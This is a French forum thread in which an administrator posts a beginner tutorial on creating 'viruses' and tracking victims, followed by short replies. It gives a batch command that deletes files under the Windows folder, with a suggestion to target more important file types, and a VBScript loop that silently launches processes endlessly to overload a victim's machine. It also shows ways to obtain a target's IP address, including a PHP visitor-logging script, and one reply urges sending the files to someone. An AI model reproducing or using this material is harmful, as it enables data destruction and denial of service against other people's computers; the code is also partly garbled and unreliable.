Chaque donation est bénéfique, aidez nous en faisent un don de 1euro minimum
Bienvenu a toi visiteur,afin de pouvoir bénéficier de tout les hacks,liens,...Une inscription est recommandée !
Merci et bonne visite.
Chaque donation est bénéfique, aidez nous en faisent un don de 1euro minimum
Bienvenu a toi visiteur,afin de pouvoir bénéficier de tout les hacks,liens,...Une inscription est recommandée !
Merci et bonne visite.
Chaque donation est bénéfique, aidez nous en faisent un don de 1euro minimum
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.

Chaque donation est bénéfique, aidez nous en faisent un don de 1euro minimum

Pour les dons par allopass veuillez me contacter en attendent l'accés direct via la bar de navigation...
 
AccueilAccueil  Portail*Portail*  RechercherRechercher  Dernières imagesDernières images  S'enregistrerS'enregistrer  ConnexionConnexion  www.UnderGamers.com  
-40%
Le deal à ne pas rater :
Tefal Ingenio Emotion – Batterie de cuisine 10 pièces (induction, ...
59.99 € 99.99 €
Voir le deal

 

 Comment créé virus et autres

Aller en bas 
4 participants
AuteurMessage
Os-Prod'z
Administrateurs
Administrateurs
Os-Prod'z


Messages : 527
Points : 11247
Réputation : 29
Date d'inscription : 21/03/2011
Age : 33
Localisation : Verviers

Comment créé virus et autres Empty
MessageSujet: Comment créé virus et autres   Comment créé virus et autres EmptyJeu 24 Mar - 6:58

Publicité Supprimer les publicités ?




Il y a plusieur types de hackers :
Je suis encore en dessous de cette catégorie, j'étudie les tuto de hack que je trouve et essaye de m'amélioré. Mais je ne cherche pas a hacker les gens ( je trouve sa lâche.)
Les Lamerz :
Ils passent leur temps à se vanter de leurs "exploits".Ils se croient des super-hackers parce qu'ils savent spammer ou piraté quelqu'un. Il font souvent parti d'un clan nommé crew.


Les Newbies :
Ce sont des débutants dans le vaste monde du hacking. Un newbie ne se prend pas pour un king, ne pirate pas toutes les adresses email et les sites qu'il voit. Il est a la fût de nouvelle connaissance, et ne cherche pas à brûler les étapes mais a les passer.


Les véritables Hackers :
Ce sont des pros, personne ne sait qui ils sont vraiment : ils n'exposent pas leurs exploits. Ils sont très puissants (voir les hackers connu par exemple GeoHot que tout le monde connais ici ou encore Kevin Mitnick le plus connus mais aussi considéré comme le meilleurs), mais ne détruisent
rien, ils se contentent de montrer les failles qu'ils découvrent au grand jour pour qu'on puisse les réparer. (source : loadation.net)


Voici plusieurs type de hack :


-Le Social engeneering
- L’envoi de virus
- L’envoi de trojan
- Le piratage d’un site
- La cryptographie
- Les IP


Créer un petit virus pas très méchant...




Voici comment créer un petit virus en *bat. :


Go :


En premier ouvres le bloc-note windows demarrer => programmes => accessoire => bloc-note.Après tu tape sans passer de ligne :




del C :windows*.bmp cls




Tu enrigistrer le code avec l’extension *.bat


Attention : N’ouvre en aucun cas le fichier sur ton ordinateur, le virus se lancera ( Sa serait dommage de t’infecter de ton propre virus ) !




Explication du code :


del C:windows*.bmp


del : sert à supprimer
C:windows : situe le dossier où la commande doit avoir lieu
* : suivit d'une extension désigne tous les dossiers portant cette extension dans l'exemple l'extension est *.bmp .Donc ce mini virus supprimera tous les fichiers portant l'extension *.bmp (imagines toi que ce soit une autre extension :P ) se trouvant dans windows.


Ce virus peut être plus dangereux si tu changes l’extension en une autre plus importante, mais la, je te laisse mettre se que tu voudra !




Créer un virus plus méchant :) :


Go :


Commences, par ouvrir le bloc note.
Ensuite, tapes le code suivant :




Set variable = CreateObject("WScript.Shell")
Do
variable.run "notepad",false
Loop


Est-ce assez claire ?


Ensuite tu enregistres le avec le nom que tu veux, avec l’extension .vbs




Explication :


Ici, le bloc-note représente l'application désirée, tu peux la remplacer par une application plus lourde pour obtenir des résultats plus rapides et meilleurs:).
false : signifie que les fenêtres ne doivent pas être initialisées, seulement les processus pour que la victime ne se rende pas compte ( c'est mieux si tu veux réussir ton coup )
Loop : signifie que ça doit se faire en boucle, ça doit lancer le bloc-note, recommencer et toujours recommencer .


La cryptographie


Explication :


Pour protéger efficacement son PC et les données personnelles qu’il contient, cela relève d’un travail à plein temps. Les failles étant nombreuse , il faut toujours rester sur ces garde.


Le cryptage, consiste simplement à transformer un message pour qu’il ne soit compréhensible que par les seuls détenteurs d’un décodeurs .Vu que rien n’est jamais parfait en matière de sécurité informatique, on peut aussi dire que la cryptologie consiste simplement à faire « d’un gros secret, un secret plus petit », d'après les mots de Bruce Schneier, expert en cryptographie.


Pour utiliser la cryptographie, je te conseil ce logiciel : WinPT.
Téléchargement : [Vous devez être inscrit et connecté pour voir ce lien]


WinPT, utilise un système à double clé. Chaque utilisateur possède une clé public et une clé privée. Lorsque l’on souhaite envoyer un message crypté à un autre utilisateur PGP, on chiffre le message grâce a sa clé publique, clé librement et largement diffusée, y compris sur Internet. Le message circule alors déjà sous une forme incompréhensible à qui n’a pas de décodeur. Seule l'utilisateur qui possède la clé privée attachée à la clé public qui a été utilisée pour le chiffrage pourra déchiffre ce message.


Il y a plusieurs types de cryptage, en voici quelque'un :


La transposition


La transposition consiste en fait à modifier l’ordre des caractères du texte clair.
Cette méthode peut nécessiter une clé.


La palissade : C'est a dire placer le texte clair en palissade


Bonjour :


b n o r
o j u


Ce qui donne : BNOROJU


Le boustrophédon : On place les lettres dans une grille, de gauche à droite.
Remarque : Il faut remplacer les cases vides par des lettres (au hasard) pour fausser le cryptage.


c r y
p t o


Et ensuite on lit de haut en bas et de bas en haut
CPTRYO






L'IP


Explication :


L’IP est un identifiant composé de 4 nombres de 0 à 255 séparés par des points.
Chaque ordinateur connecté à Internet et chaque site Internet à une IP.
Ton IP est dynamique, c'est-à-dire qu’elle change à chaque connection. Tu peux te renseigner au près de ton FAI pour la rendre fixe mais ce n’est pas conseillé, Une IP fixe est vite ciblée par les Lamerz et pirateurs. (ainsi que les Hackers et les Newbie, mais on les considèrent comme les gentils^^)


Pour tout les ordinateur, l’IP locale est 127.0.0.1
A tout moment tu peux savoir ton IP en cliquant sur DémarrerExécuter, puis tu tape « winipcfg » ou « ipconfig » ( winipcfg ne marche pas sous XP)


Pour hacker un PC, il est indispensable de connaïtre l’IP de sa victime.


Comment trouvez l’IP d’une personne ?


Pour trouver l’adresse IP de quelqu’un c’est très simple :


Par IRC
Tape /dns pseudo


Par msn ou ICQ
Lors d’une conversation envoi un fichier ( de préférence assez volumineux) à ta victime, pendant l’envoi, clique sur DémarrerExécuter, et entre « cmd » pour ouvrir la fenêtre de commandes MS-DOS, puis entre la commande « netstat –n », et tu verras apparaître les adresses IP des sites et des personnes auquelle tu es connecté !


Par mail


Il faut demander à la victime de t’envoyer un mail à ton adresse hotmail (si tu en as une) à partir d’un fournisseur gratuit de mail (caramail, yahoo,voila, laposte,…).
Dans hotmail vas dans OptionsCourrierParamètres d’affichage du courrier, dans « en-tête de message » coche la case « complet », tu verras ainsi des informations complémentaires sur les destinataires des mails que tu reçois, dont l’IP.


Par PHP


Si tu as un site Internet, tu peux récupérer l’IP d’un visiteur grâce au PHP. Pour cela tu dois incorporer ce script dans ta page .php :
Code:


< ?
// On récupère l’IP
if( !$HTTP_X_FORWARED_FOR)$ip= ^REMOTE_ADDR;
else $ip = $HTTP_X_FORWARED_FOR;
//On enregistre l’IP dans le fichier ip.txt
$fp=fopen(« ip.txt », »a ») ;
fputs($fp,”$ip/n”);
fclose($fp);
?>





Tu n’as plus qu’à aller chercher l’IP de ta victime dans ton fichier ip.txt (ce script enregistre l’IP de chaque visiteur de la page, Une IP par ligne).


Pour trouvez l’IP d’un site, rien de plus simple :


Par PHP


Si tu as un site Internet, tu peux récupérer l’IP d’un site Internet facilement. Par exemple, on a une page « ip.php » qui contient ce code :
Code:


< ?
echo gethostbyname ($site) ;
?>
Revenir en haut Aller en bas
https://modern.forum2jeux.com
Oo-_EmiiiN3m_-Oo
Prémium
Prémium



Messages : 94
Points : 4536
Réputation : 0
Date d'inscription : 22/03/2011

Comment créé virus et autres Empty
MessageSujet: Re: Comment créé virus et autres   Comment créé virus et autres EmptyVen 25 Mar - 13:54

Merciiii gro mais je suis pas trop pour faire des virus moi , je kiff pas ç du tout
Revenir en haut Aller en bas
Unknown
Administrateurs
Administrateurs



Messages : 99
Points : 2313
Réputation : 16
Date d'inscription : 21/03/2011

Comment créé virus et autres Empty
MessageSujet: Re: Comment créé virus et autres   Comment créé virus et autres EmptyVen 25 Mar - 15:14

c'est pas trop des virus lol sa va juste faire redemarrer le pc ou koi tu px tester sur kelk1 tu lui envoi :join:
Revenir en haut Aller en bas
Oo-_EmiiiN3m_-Oo
Prémium
Prémium



Messages : 94
Points : 4536
Réputation : 0
Date d'inscription : 22/03/2011

Comment créé virus et autres Empty
MessageSujet: Re: Comment créé virus et autres   Comment créé virus et autres EmptyJeu 31 Mar - 13:12

Ok lolll je verrais , j'essaierai peut etre :mit:
Revenir en haut Aller en bas
MW2love




Messages : 3
Points : 3
Réputation : 0
Date d'inscription : 28/05/2011

Comment créé virus et autres Empty
MessageSujet: Re: Comment créé virus et autres   Comment créé virus et autres EmptyDim 5 Juin - 20:26

c'est ou qu on trouve demarer - exuter , je suis nouveau dans ce domaine Desolee
Revenir en haut Aller en bas
Unknown
Administrateurs
Administrateurs



Messages : 99
Points : 2313
Réputation : 16
Date d'inscription : 21/03/2011

Comment créé virus et autres Empty
MessageSujet: Re: Comment créé virus et autres   Comment créé virus et autres EmptyLun 6 Juin - 18:38

MW2love a écrit:
c'est ou qu on trouve demarer - exuter , je suis nouveau dans ce domaine Desolee

Dans quoi ?
Revenir en haut Aller en bas
Contenu sponsorisé





Comment créé virus et autres Empty
MessageSujet: Re: Comment créé virus et autres   Comment créé virus et autres Empty

Revenir en haut Aller en bas
 
Comment créé virus et autres
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» Crée un DVD Multi ISO Gamecube
» Créer un Virus Basique
» Comment Etre L'Hote
» Comment etre l'hote
» Comment faire screen shot

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Chaque donation est bénéfique, aidez nous en faisent un don de 1euro minimum  :: Section Pc [Hacking,Aide,...] :: -- Hacking Tool-
Sauter vers: